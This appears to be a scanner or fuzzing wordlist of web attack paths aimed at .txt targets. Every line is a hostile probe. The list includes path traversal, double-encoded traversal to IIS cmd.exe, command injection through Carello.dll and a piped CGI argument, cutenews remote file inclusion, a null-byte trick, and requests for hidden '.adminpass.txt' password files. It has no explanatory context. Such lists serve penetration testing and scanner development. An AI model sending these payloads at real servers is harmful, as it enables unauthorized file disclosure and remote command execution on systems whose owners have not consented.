../../myServerEXEC-0.2/readme.txt
../readme.txt
.adminpass.txt
_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:orderinfo.txt
8000/servlet/com.livesoftware.jrun.plugins.jsp.JSP/../../../tst.txt
8000/servlet/jsp/../../tst.txt
8080/../readme.txt
admin.php?upload=1&file=config.php&file_name=tmp.txt&wdir=/images/&userfile=config.php&userfile_name=tmp.txt
cgi-bin/.adminpass.txt
cgi-bin/data/.adminpass.txt
cgi-bin/newsdesk.cgi?t=../pass.txt
cgi-bin/tst.bat|type%20c:/file.txt
chinaz.com.txt
cutenews/comments.php?cutepath=anotherhost_with_config.php_or_news.txt
cutenews/search.php?cutepath=anotherhost_with_config.php_or_news.txt
cutenews/shownews.php?cutepath=anotherhost_with_config.php_or_news.txt
data/.adminpass.txt
downcode.com.txt
ext.ini.%00.txt
icast.txtdd.txt
scripts/Carello/Carello.dll?CARELLOCODE=SITE2&VBEXE=C:..winntsystem32cmd.exe%20/c%20echo%20test>c:defcom.txt
scripts/Carello/Carello.dll?CARELLOCODE=SITE2&VBEXE=C:/../winnt/system32/cmd.exe%20/c%20echo%20test>c:/defcom.txt
servlet/com.livesoftware.jrun.plugins.jsp.JSP/../../../tst.txt
servlet/jsp/../../tst.txt
wx/s.dll?d=/bootlog.txt